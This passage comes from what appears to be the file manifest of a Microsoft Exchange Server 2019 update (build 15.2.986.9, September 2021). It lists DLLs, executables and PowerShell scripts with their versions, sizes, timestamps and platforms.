\nDisable_outsidein.ps1| Not applicable| 13,686| 29-Sep-21| 19:58| Not applicable \nDisklockerapi.dll| Not applicable| 22,400| 29-Sep-21| 19:47| x64 \nDlmigrationmodule.psm1| Not applicable| 39,612| 29-Sep-21| 19:58| Not applicable \nDsaccessperf.dll| 15.2.986.9| 45,960| 29-Sep-21| 19:47| x64 \nDscperf.dll| 15.2.986.9| 32,632| 29-Sep-21| 19:50| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.986.9| 1,686,408| 29-Sep-21| 19:44| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.986.9| 601,480| 29-Sep-21| 20:15| x86 \nEcpperfcounters.xml| Not applicable| 31,160| 29-Sep-21| 19:50| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,672| 29-Sep-21| 19:47| x86 \nEdgetransport.exe| 15.2.986.9| 49,544| 29-Sep-21| 21:06| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 505| 29-Sep-21| 19:44| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,664| 29-Sep-21| 19:47| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:47| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:50| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:47| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:50| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:47| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:44| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,664| 29-Sep-21| 19:47| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.986.9| 13,184| 29-Sep-21| 19:50| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:50| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:47| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:47| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,396| 29-Sep-21| 19:58| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,595| 29-Sep-21| 19:58| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,620| 29-Sep-21| 19:59| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,630| 29-Sep-21| 19:58| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,948| 29-Sep-21| 19:58| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,679| 29-Sep-21| 19:58| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.986.9| 17,808| 29-Sep-21| 19:58| x86 \nEscprint.dll| 15.2.986.9| 20,360| 29-Sep-21| 19:44| x64 \nEse.dll| 15.2.986.9| 3,741,560| 29-Sep-21| 19:48| x64 \nEseback2.dll| 15.2.986.9| 350,096| 29-Sep-21| 19:52| x64 \nEsebcli2.dll| 15.2.986.9| 318,344| 29-Sep-21| 19:47| x64 \nEseperf.dll| 15.2.986.9| 108,944| 29-Sep-21| 19:52| x64 \nEseutil.exe| 15.2.986.9| 425,360| 29-Sep-21| 19:52| x64 \nEsevss.dll| 15.2.986.9| 44,424| 29-Sep-21| 19:50| x64 \nEtweseproviderresources.dll| 15.2.986.9| 101,240| 29-Sep-21| 19:44| x64 \nEventperf.dll| 15.2.986.9| 59,792| 29-Sep-21| 19:44| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,105| 29-Sep-21| 21:46| Not applicable \nExchange.format.ps1xml| Not applicable| 649,690| 29-Sep-21| 21:46| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,335| 29-Sep-21| 21:46| Not applicable \nExchange.ps1| Not applicable| 20,803| 29-Sep-21| 21:46| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,547| 29-Sep-21| 21:39| Not applicable \nExchange.types.ps1xml| Not applicable| 365,145| 29-Sep-21| 21:46| Not applicable \nExchangeudfcommon.dll| 15.2.986.9| 122,768| 29-Sep-21| 19:47| x86 \nExchangeudfs.dll| 15.2.986.9| 272,776| 29-Sep-21| 19:50| x86 \nExchmem.dll| 15.2.986.9| 86,408| 29-Sep-21| 19:44| x64 \nExchsetupmsg.dll| 15.2.986.9| 19,336| 29-Sep-21| 19:44| x64 \nExdbfailureitemapi.dll| Not applicable| 27,016| 29-Sep-21| 19:44| x64 \nExdbmsg.dll| 15.2.986.9| 230,792| 29-Sep-21| 19:52| x64 \nExeventperfplugin.dll| 15.2.986.9| 25,464| 29-Sep-21| 19:52| x64 \nExmime.dll| 15.2.986.9| 364,936| 29-Sep-21| 19:50| x64 \nExportedgeconfig.ps1| Not applicable| 27,423| 29-Sep-21| 19:58| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,590| 29-Sep-21| 19:58| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,238| 29-Sep-21| 19:58| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,390| 29-Sep-21| 19:47| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,157| 29-Sep-21| 19:58| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,076| 29-Sep-21| 19:58| Not applicable \nExppw.dll| 15.2.986.9| 83,336| 29-Sep-21| 19:48| x64 \nExprfdll.dll| 15.2.986.9| 26,512| 29-Sep-21| 19:48| x64 \nExrpc32.dll| 15.2.986.9| 2,029,432| 29-Sep-21| 19:58| x64 \nExrw.dll| 15.2.986.9| 28,040| 29-Sep-21| 19:44| x64 \nExsetdata.dll| 15.2.986.9| 2,779,512| 29-Sep-21| 19:58| x64 \nExsetup.exe| 15.2.986.9| 35,216| 29-Sep-21| 21:41| x86 \nExsetupui.exe| 15.2.986.9| 471,952| 29-Sep-21| 21:41| x86 \nExtrace.dll| 15.2.986.9| 245,136| 29-Sep-21| 19:44| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.986.9| 601,480| 29-Sep-21| 20:15| x86 \nExwatson.dll| 15.2.986.9| 44,936| 29-Sep-21| 19:47| x64 \nFastioext.dll| 15.2.986.9| 60,296| 29-Sep-21| 19:50| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,630| 29-Sep-21| 23:10| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,227| 29-Sep-21| 23:10| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,759| 29-Sep-21| 23:10| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,404| 29-Sep-21| 23:10| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,656| 29-Sep-21| 23:11| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,758| 29-Sep-21| 23:11| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,627| 29-Sep-21| 23:10| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,603| 29-Sep-21| 23:11| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 29-Sep-21| 23:10| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,344| 29-Sep-21| 23:11| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,258| 29-Sep-21| 23:10| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,753| 29-Sep-21| 23:11| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 29-Sep-21| 23:13| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 29-Sep-21| 23:13| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 29-Sep-21| 23:13| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,729| 29-Sep-21| 23:10| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,759| 29-Sep-21| 23:11| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 29-Sep-21| 23:13| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,633| 29-Sep-21| 23:11| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 29-Sep-21| 23:13| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,657| 29-Sep-21| 23:11| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,756| 29-Sep-21| 23:10| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,633| 29-Sep-21| 23:10| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 29-Sep-21| 23:11| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 29-Sep-21| 23:10| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,776| 29-Sep-21| 23:10| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,633| 29-Sep-21| 23:10| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 29-Sep-21| 23:13| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,639| 29-Sep-21| 23:11| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 29-Sep-21| 23:10| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,263| 29-Sep-21| 19:59| Not applicable \nFilteringpowershell.dll| 15.2.986.9| 223,120| 29-Sep-21| 20:01| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,664| 29-Sep-21| 20:01| Not applicable \nFiltermodule.dll| 15.2.986.9| 180,104| 29-Sep-21| 19:47| x64 \nFipexeuperfctrresource.dll| 15.2.986.9| 15,240| 29-Sep-21| 19:47| x64 \nFipexeventsresource.dll| 15.2.986.9| 44,936| 29-Sep-21| 19:48| x64 \nFipexperfctrresource.dll| 15.2.986.9| 32,648| 29-Sep-21| 19:47| x64 \nFirewallres.dll| 15.2.986.9| 72,584| 29-Sep-21| 19:44| x64 \nFms.exe| 15.2.986.9| 1,350,032| 29-Sep-21| 20:15| x64 \nForefrontactivedirectoryconnector.exe| 15.2.986.9| 110,992| 29-Sep-21| 19:47| x64 \nFpsdiag.exe| 15.2.986.9| 18,808| 29-Sep-21| 19:47| x86 \nFsccachedfilemanagedlocal.dll| 15.2.986.9| 822,136| 29-Sep-21| 19:47| x64 \nFscconfigsupport.dll| 15.2.986.9| 56,720| 29-Sep-21| 19:44| x86 \nFscconfigurationserver.exe| 15.2.986.9| 430,984| 29-Sep-21| 19:47| x64 \nFscconfigurationserverinterfaces.dll| 15.2.986.9| 15,736| 29-Sep-21| 19:47| x86 \nFsccrypto.dll| 15.2.986.9| 208,784| 29-Sep-21| 19:44| x64 \nFscipcinterfaceslocal.dll| 15.2.986.9| 28,552| 29-Sep-21| 19:44| x86 \nFscipclocal.dll| 15.2.986.9| 38,280| 29-Sep-21| 19:48| x86 \nFscsqmuploader.exe| 15.2.986.9| 453,504| 29-Sep-21| 19:50| x64 \nGetucpool.ps1| Not applicable| 19,787| 29-Sep-21| 19:58| Not applicable \nGetvalidengines.ps1| Not applicable| 13,306| 29-Sep-21| 19:52| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,805| 29-Sep-21| 19:44| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,651| 29-Sep-21| 19:44| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,723| 29-Sep-21| 19:44| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,771| 29-Sep-21| 19:44| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,494| 29-Sep-21| 19:44| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,701| 29-Sep-21| 19:44| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,806| 29-Sep-21| 19:44| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,368| 29-Sep-21| 19:58| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,979| 29-Sep-21| 19:58| Not applicable \nGet_mitigations.ps1| Not applicable| 25,618| 29-Sep-21| 19:58| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,058| 29-Sep-21| 19:58| Not applicable \nGet_storetrace.ps1| Not applicable| 51,883| 29-Sep-21| 19:52| Not applicable \nHuffman_xpress.dll| 15.2.986.9| 32,632| 29-Sep-21| 19:47| x64 \nImportedgeconfig.ps1| Not applicable| 77,280| 29-Sep-21| 19:58| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,512| 29-Sep-21| 19:58| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,850| 29-Sep-21| 19:58| Not applicable \nInproxy.dll| 15.2.986.9| 85,888| 29-Sep-21| 19:50| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,519| 29-Sep-21| 19:44| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,925| 29-Sep-21| 19:44| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,979| 29-Sep-21| 22:06| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.986.9| 107,400| 29-Sep-21| 19:44| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.986.9| 20,360| 29-Sep-21| 19:47| Not applicable \nInterop.certenroll.dll| 15.2.986.9| 142,712| 29-Sep-21| 19:44| x86 \nInterop.licenseinfointerface.dll| 15.2.986.9| 14,224| 29-Sep-21| 19:52| x86 \nInterop.netfw.dll| 15.2.986.9| 34,168| 29-Sep-21| 19:44| x86 \nInterop.plalibrary.dll| 15.2.986.9| 72,592| 29-Sep-21| 19:44| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.986.9| 27,000| 29-Sep-21| 19:44| Not applicable \nInterop.taskscheduler.dll| 15.2.986.9| 46,480| 29-Sep-21| 19:44| x86 \nInterop.wuapilib.dll| 15.2.986.9| 60,808| 29-Sep-21| 19:47| x86 \nInterop.xenroll.dll| 15.2.986.9| 39,816| 29-Sep-21| 19:44| x86 \nKerbauth.dll| 15.2.986.9| 62,848| 29-Sep-21| 19:47| x64 \nLicenseinfointerface.dll| 15.2.986.9| 643,472| 29-Sep-21| 19:52| x64 \nLpversioning.xml| Not applicable| 20,466| 29-Sep-21| 21:41| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,916| 29-Sep-21| 19:52| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.986.9| 138,632| 29-Sep-21| 19:44| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,233| 29-Sep-21| 19:52| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,352| 29-Sep-21| 19:52| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,119| 29-Sep-21| 19:58| Not applicable \nMce.dll| 15.2.986.9| 1,693,064| 29-Sep-21| 19:47| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,499| 29-Sep-21| 19:52| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,655| 29-Sep-21| 19:58| Not applicable \nMicrosoft.database.isam.dll| 15.2.986.9| 127,864| 29-Sep-21| 19:52| x86 \nMicrosoft.dkm.proxy.dll| 15.2.986.9| 25,984| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.986.9| 68,472| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.986.9| 17,792| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.986.9| 233,360| 29-Sep-21| 21:35| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.986.9| 15,752| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.986.9| 43,400| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.986.9| 1,775,504| 29-Sep-21| 21:18| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.986.9| 505,232| 29-Sep-21| 22:02| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.986.9| 76,152| 29-Sep-21| 22:04| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.986.9| 135,560| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.986.9| 23,432| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.986.9| 15,752| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.986.9| 27,000| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.986.9| 53,640| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.assistants.dll| 15.2.986.9| 925,048| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.986.9| 25,992| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.986.9| 43,400| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.986.9| 15,248| 29-Sep-21| 21:39| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.986.9| 14,712| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.986.9| 70,544| 29-Sep-21| 21:35| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.986.9| 94,592| 29-Sep-21| 21:46| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.986.9| 13,184| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.986.9| 15,760| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.986.9| 36,744| 29-Sep-21| 21:35| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.986.9| 15,760| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.986.9| 79,736| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.986.9| 396,176| 29-Sep-21| 21:20| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.986.9| 21,368| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.986.9| 57,224| 29-Sep-21| 21:23| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.986.9| 14,736| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.986.9| 35,728| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.986.9| 276,352| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.986.9| 16,248| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.986.9| 25,992| 29-Sep-21| 21:35| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.986.9| 13,688| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.986.9| 23,440| 29-Sep-21| 21:35| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.986.9| 378,232| 29-Sep-21| 21:06| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.986.9| 83,832| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.986.9| 2,971,512| 29-Sep-21| 22:06| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.986.9| 5,019,000| 29-Sep-21| 22:02| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.986.9| 893,312| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.986.9| 413,072| 29-Sep-21| 21:43| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.986.9| 924,552| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.986.9| 31,120| 29-Sep-21| 21:10| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.986.9| 52,104| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.986.9| 21,904| 29-Sep-21| 19:59| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.986.9| 33,656| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.986.9| 3,562,376| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.986.9| 108,408| 29-Sep-21| 19:52| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.986.9| 288,656| 29-Sep-21| 21:11| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.986.9| 627,576| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.986.9| 86,416| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.986.9| 1,830,272| 29-Sep-21| 20:02| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.986.9| 31,632| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.986.9| 466,320| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.986.9| 25,976| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.986.9| 38,264| 29-Sep-21| 19:59| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.986.9| 102,800| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.986.9| 48,504| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.986.9| 67,456| 29-Sep-21| 19:48| x86 \nMicrosoft.exchange.common.dll| 15.2.986.9| 172,936| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.986.9| 113,528| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.common.il.dll| 15.2.986.9| 13,688| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.986.9| 130,424| 29-Sep-21| 19:59| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.986.9| 63,872| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.986.9| 19,856| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.986.9| 15,224| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.common.search.dll| 15.2.986.9| 108,944| 29-Sep-21| 19:59| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.986.9| 17,800| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.986.9| 51,088| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.986.9| 36,752| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.986.9| 27,536| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.986.9| 1,042,312| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.986.9| 29,048| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.986.9| 13,176| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.986.9| 181,136| 29-Sep-21| 21:48| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.986.9| 30,096| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.986.9| 22,416| 29-Sep-21| 20:35| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.986.9| 85,888| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.compliance.dll| 15.2.986.9| 51,088| 29-Sep-21| 19:48| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.986.9| 37,256| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.986.9| 50,576| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.986.9| 33,144| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.986.9| 1,099,640| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.986.9| 206,224| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.986.9| 210,808| 29-Sep-21| 21:23| x86 \nMicrosoft.exchange.compression.dll| 15.2.986.9| 17,272| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.986.9| 37,776| 29-Sep-21| 20:57| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.986.9| 14,200| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.986.9| 145,808| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.986.9| 14,216| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.986.9| 53,136| 29-Sep-21| 20:56| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.986.9| 15,760| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.986.9| 23,432| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.986.9| 13,192| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.986.9| 54,656| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.986.9| 13,712| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.986.9| 1,846,152| 29-Sep-21| 20:57| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.986.9| 30,088| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.986.9| 68,472| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.986.9| 15,248| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.986.9| 21,392| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.986.9| 13,176| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.986.9| 25,992| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.986.9| 169,848| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.986.9| 330,104| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.986.9| 173,944| 